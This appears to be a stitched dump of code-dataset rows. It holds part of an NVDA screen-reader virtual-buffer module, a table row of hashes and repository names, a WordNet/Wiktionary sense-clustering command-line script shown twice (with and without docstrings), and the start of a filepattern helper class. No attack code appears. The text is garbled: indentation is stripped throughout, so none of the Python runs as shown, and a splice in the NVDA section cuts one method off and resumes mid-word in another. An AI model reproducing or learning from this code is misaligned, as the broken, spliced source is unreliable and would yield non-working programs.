NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
if not any((docHandle.value, ID.value)):
raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getBoundingRectFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
if not o:
raise LookupError("no NVDAObject at offset %d" % offset)
if o.hasIrrelevantLocation:
raise LookupError("Object is off screen, invisible or has no location")
return o.location
def _getNVDAObjectFromOffset(self,offset):
try:
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
except LookupError:
log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
return None
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
placeholder = attrs.get(placeholderAttrsKey)
if not placeholder:
return None
try:
start, end = self._getOffsetsFromFieldIdentifier(
int(attrs.get('controlIdentifier_docHandle')),
int(attrs.get('controlIdentifier_ID')))
except (LookupError, ValueError):
log.debugWarning("unable to get offsets used to fetch content")
return placeholder
else:
valueLen = end - start
if not valueLen:
return placeholder
if valueLen < 2:
controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
if not controlFieldText or controlFieldText == ' ':
return placeholder
return None
def _getFieldsInRange(self,start,end):
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in range(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
return self._getFieldsInRange(start,end)
def _getWordOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
attrVal=attrs.get(attr)
if attrVal is not None:
attrs[attr]=int(attrVal)
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
attrs['alwaysReportName'] = True
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
strippedCharsFromStart = attrs.get("strippedCharsFromStart")
if strippedCharsFromStart is not None:
assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == textInfos.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
elif unit == textInfos.UNIT_FORMATFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def activate(self):
self.obj._activatePosition(info=self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
def prepare(self):
if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
# So at very least don't try to prepare a virtualBuffer as it will fail.
log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
return
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
super(VirtualBuffer,self).terminate()
if not self.VBufHandle:
return
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(
name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
target=self._loadBuffer).start(
)
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
self.rootNVDAObject.appModule.helperLocalBindingHandle,
self.rootDocHandle,self.rootID,
self.backendName
)
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
ui.message(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=str(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
@abstractmethod
def getNVDAObjectFromIdentifier(self, docHandle, ID):
raise NotImplementedError
@abstractmethod
def getIdentifierFromNVDAObject(self,obj):
raise NotImplementedError
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
ui.message(_("Use screen layout on"))
else:
ui.message(_("Use screen layout off"))
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def _getTableCellAt(self,tableID,startPos,row,column):
try:
return next(self._iterTableCells(tableID,row=row,column=column))
except StopIteration:
raise LookupError
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
if destCol < 1:
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return self._getTableCellAt(tableID,startPos,destRow,destCol)
except LookupError:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
raise LookupError
else:
# We're moving forward by column.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
def _isSuitableNotLinkBlock(self, textRange):
return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN
def getEnclosingContainerRange(self, textRange):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in textRange.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets = textRange._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
if not self.VBufHandle:
ontrolFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = str(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
def _isNVDAObjectInApplication_noWalk(self, obj):
inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
if inApp is not None:
return inApp
try:
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
except:
log.debugWarning("getIdentifierFromNVDAObject failed. "
"Object probably died while walking ancestors.", exc_info=True)
return None
node = VBufRemote_nodeHandle_t()
if not self.VBufHandle:
return None
try:
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId,ctypes.byref(node))
except WindowsError:
return None
if node:
return False
return None
__gestures = {
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
}
| true | true |
f718f706894e02a8cb3427d1bb25139c6ae58378 | 7,286 | py | Python | man_clus.py | frankier/finn-sense-clust | 9b76ee3bdacc9b039432674306650c6edb9da3bb | [
"Apache-2.0"
] | null | null | null | man_clus.py | frankier/finn-sense-clust | 9b76ee3bdacc9b039432674306650c6edb9da3bb | [
"Apache-2.0"
] | 2 | 2019-04-27T14:40:10.000Z | 2019-08-21T15:43:19.000Z | man_clus.py | frankier/finn-sense-clust | 9b76ee3bdacc9b039432674306650c6edb9da3bb | [
"Apache-2.0"
] | null | null | null | from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
"""
Generate unclustered words in OUT_DIR from word list WORDS
"""
session = get_session()
for word in words:
word_pos = word.split("#")[0].strip()
word, pos = word_pos.split(".")
assert pos == "Noun"
with open(pjoin(out_dir, word_pos), "w") as outf:
# Get Wiktionary results
results = session.execute(select([
word_sense.c.sense_id,
word_sense.c.etymology_index,
word_sense.c.sense,
word_sense.c.extra,
]).select_from(joined).where(
(headword.c.name == word) &
(word_sense.c.pos == "Noun")
).order_by(word_sense.c.etymology_index)).fetchall()
prev_ety = None
for row in results:
if prev_ety is not None and row["etymology_index"] != prev_ety:
outf.write("\n")
outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
prev_ety = row["etymology_index"]
# Get WordNet results
for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
wordnets = {wn for wn, _ in lemma_objs}
outf.write("\n")
outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
"""
Add table of frequencies to DB
"""
session = get_session()
metadata.create_all(session().get_bind().engine)
with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
for name, freq in name_freqs:
insert(session, freqs, name=name, freq=freq)
session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
"""
Compile manually clustered words in files INFS to OUT as a gold csv ready
for use by eval
"""
out.write("manann,ref\n")
for inf in infs:
word_pos = basename(inf)
word = word_pos.split(".")[0]
idx = 1
with open(inf) as f:
for line in f:
if not line.strip():
idx += 1
else:
ref = line.split("#")[0].strip()
out.write(f"{word}.{idx:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
session = get_session()
for lemma, grouping in gen_groupings(inf):
with open(pjoin(out_dir, lemma), "w") as outf:
first = True
for group_num, synsets in grouping.items():
if not first:
outf.write("\n")
else:
first = False
for synset in synsets:
outf.write(synset)
outf.write(" # ")
if is_wn_ref(synset):
sense = wordnet.of2ss(synset).definition()
else:
sense = session.execute(select([
word_sense.c.sense,
]).select_from(joined).where(
(headword.c.name == lemma) &
(word_sense.c.sense_id == synset)
)).fetchone()["sense"]
tokens = word_tokenize(sense)
outf.write(" ".join(tokens))
outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):
"""
Filter a gold CSV to filter non-WordNet rows
"""
assert inf.readline().strip() == "manann,ref"
outf.write("manann,ref\n")
if filter in ("wn", "wiki"):
for line in inf:
manann, ref = line.strip().split(",")
if ((filter == "wn") and not is_wn_ref(ref)) or \
((filter == "wiki") and is_wn_ref(ref)):
continue
outf.write(line)
else:
groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
for lemma, group in groups:
wn_grp = []
wiki_grp = []
for tpl in group:
if is_wn_ref(tpl[2]):
wn_grp.append(tpl)
else:
wiki_grp.append(tpl)
grp_idx = 1
for _, f1, lid1 in wn_grp:
for _, f2, lid2 in wiki_grp:
if f1 == f2:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
else:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
"""
Pick etymologically ambigious nouns for creating manual clustering.
"""
query = select([
headword.c.name,
freqs.c.freq,
]).select_from(joined_freq).where(
word_sense.c.etymology_index.isnot(None) &
(word_sense.c.pos == "Noun") &
word_sense.c.inflection_of_id.is_(None)
).group_by(
headword.c.id
).having(
count(
distinct(word_sense.c.etymology_index)
) > 1
).order_by(freqs.c.freq.desc()).limit(limit)
session = get_session()
candidates = session.execute(query).fetchall()
for word, freq in candidates:
print(word + ".Noun", "#", freq)
if verbose:
print("\n")
for word, _ in candidates:
print("#", word)
pprint(session.execute(select([
word_sense.c.sense_id,
word_sense.c.sense,
]).select_from(joined).where(
headword.c.name == word
)).fetchall())
if __name__ == "__main__":
man_clus()
| 35.198068 | 131 | 0.549684 | from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
session = get_session()
for word in words:
word_pos = word.split("#")[0].strip()
word, pos = word_pos.split(".")
assert pos == "Noun"
with open(pjoin(out_dir, word_pos), "w") as outf:
results = session.execute(select([
word_sense.c.sense_id,
word_sense.c.etymology_index,
word_sense.c.sense,
word_sense.c.extra,
]).select_from(joined).where(
(headword.c.name == word) &
(word_sense.c.pos == "Noun")
).order_by(word_sense.c.etymology_index)).fetchall()
prev_ety = None
for row in results:
if prev_ety is not None and row["etymology_index"] != prev_ety:
outf.write("\n")
outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
prev_ety = row["etymology_index"]
for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
wordnets = {wn for wn, _ in lemma_objs}
outf.write("\n")
outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
session = get_session()
metadata.create_all(session().get_bind().engine)
with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
for name, freq in name_freqs:
insert(session, freqs, name=name, freq=freq)
session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
out.write("manann,ref\n")
for inf in infs:
word_pos = basename(inf)
word = word_pos.split(".")[0]
idx = 1
with open(inf) as f:
for line in f:
if not line.strip():
idx += 1
else:
ref = line.split("#")[0].strip()
out.write(f"{word}.{idx:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
session = get_session()
for lemma, grouping in gen_groupings(inf):
with open(pjoin(out_dir, lemma), "w") as outf:
first = True
for group_num, synsets in grouping.items():
if not first:
outf.write("\n")
else:
first = False
for synset in synsets:
outf.write(synset)
outf.write(" # ")
if is_wn_ref(synset):
sense = wordnet.of2ss(synset).definition()
else:
sense = session.execute(select([
word_sense.c.sense,
]).select_from(joined).where(
(headword.c.name == lemma) &
(word_sense.c.sense_id == synset)
)).fetchone()["sense"]
tokens = word_tokenize(sense)
outf.write(" ".join(tokens))
outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):
assert inf.readline().strip() == "manann,ref"
outf.write("manann,ref\n")
if filter in ("wn", "wiki"):
for line in inf:
manann, ref = line.strip().split(",")
if ((filter == "wn") and not is_wn_ref(ref)) or \
((filter == "wiki") and is_wn_ref(ref)):
continue
outf.write(line)
else:
groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
for lemma, group in groups:
wn_grp = []
wiki_grp = []
for tpl in group:
if is_wn_ref(tpl[2]):
wn_grp.append(tpl)
else:
wiki_grp.append(tpl)
grp_idx = 1
for _, f1, lid1 in wn_grp:
for _, f2, lid2 in wiki_grp:
if f1 == f2:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
else:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
query = select([
headword.c.name,
freqs.c.freq,
]).select_from(joined_freq).where(
word_sense.c.etymology_index.isnot(None) &
(word_sense.c.pos == "Noun") &
word_sense.c.inflection_of_id.is_(None)
).group_by(
headword.c.id
).having(
count(
distinct(word_sense.c.etymology_index)
) > 1
).order_by(freqs.c.freq.desc()).limit(limit)
session = get_session()
candidates = session.execute(query).fetchall()
for word, freq in candidates:
print(word + ".Noun", "#", freq)
if verbose:
print("\n")
for word, _ in candidates:
print("#", word)
pprint(session.execute(select([
word_sense.c.sense_id,
word_sense.c.sense,
]).select_from(joined).where(
headword.c.name == word
)).fetchall())
if __name__ == "__main__":
man_clus()
| true | true |
f718f70961bab8dab9071693156e930da601e4b4 | 10,851 | py | Python | utils/polus-filepattern-util/filepattern/classes.py | Vishakha6/polus-plugins | ff6a31d5a6b78a26378745719f19d3e724e25670 | [
"MIT"
] | 1 | 2021-07-23T20:46:18.000Z | 2021-07-23T20:46:18.000Z | utils/polus-filepattern-util/filepattern/classes.py | Vishakha6/polus-plugins | ff6a31d5a6b78a26378745719f19d3e724e25670 | [
"MIT"
] | 2 | 2021-07-13T16:20:31.000Z | 2021-08-20T11:21:34.000Z | utils/polus-filepattern-util/filepattern/classes.py | gauharbains/polus-plugins | 5e4d1e33bb61d7619d3a76fb7c115d475628a909 | [
"MIT"
] | 3 | 2021-08-04T15:45:53.000Z | 2022-03-09T19:03:57.000Z | import copy, pathlib, typing, abc
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
""" Abstract base class for handling filepatterns
Most of the functions in filepattern return complicated variable
structures that might be difficult to use in an abstract way. This class
provides tools to streamline usage of the filepattern functions. In
particular, the iterate function is an iterable that permits simple
iteration over filenames with specific values and grouped by any variable.
"""
def __init__(self,
file_path: typing.Union[pathlib.Path,str],
pattern: str,
var_order: str = "rtczyxp"):
"""Initialize a Pattern object
Args:
file_path: Path to directory or file to parse
pattern: A filepattern string
var_order: Defines the dictionary nesting order. The list of
characters is limited to :any:`VARIABLES`. *Defaults to
"rtczyxp".*
"""
self.files = {}
self.uniques = {}
# Define iteration variables
self._kwargs = None
self._group_by = None
self.pattern = pattern
self.regex, self.variables = get_regex(pattern)
self.path = file_path
self.var_order = var_order
self.var_order = "".join([v for v in self.var_order if v in self.variables])
self.files, self.uniques = self.parse_data(file_path)
def __call__(self,group_by: list = [],**kwargs) -> typing.Iterable[typing.List[dict]]:
"""Iterate through files parsed using a filepattern
This function is an iterable. On each call, it returns a list of
filenames that matches a set of variable values. It iterates through
every combination of variable values.
Variables designated in the group_by input argument are grouped
together. So, if ``group_by="zc"``, then each iteration will return all
filenames that have constant values for each variable except z and c.
In addition to the group_by variable, specific variable arguments can
also be included as with the :any:`get_matching` function.
Args:
group_by: String of variables by which the output filenames will be
grouped
**kwargs: Each keyword argument must be a valid uppercase letter
from :any:`VARIABLES`. The value can be one integer or a list of
integers.
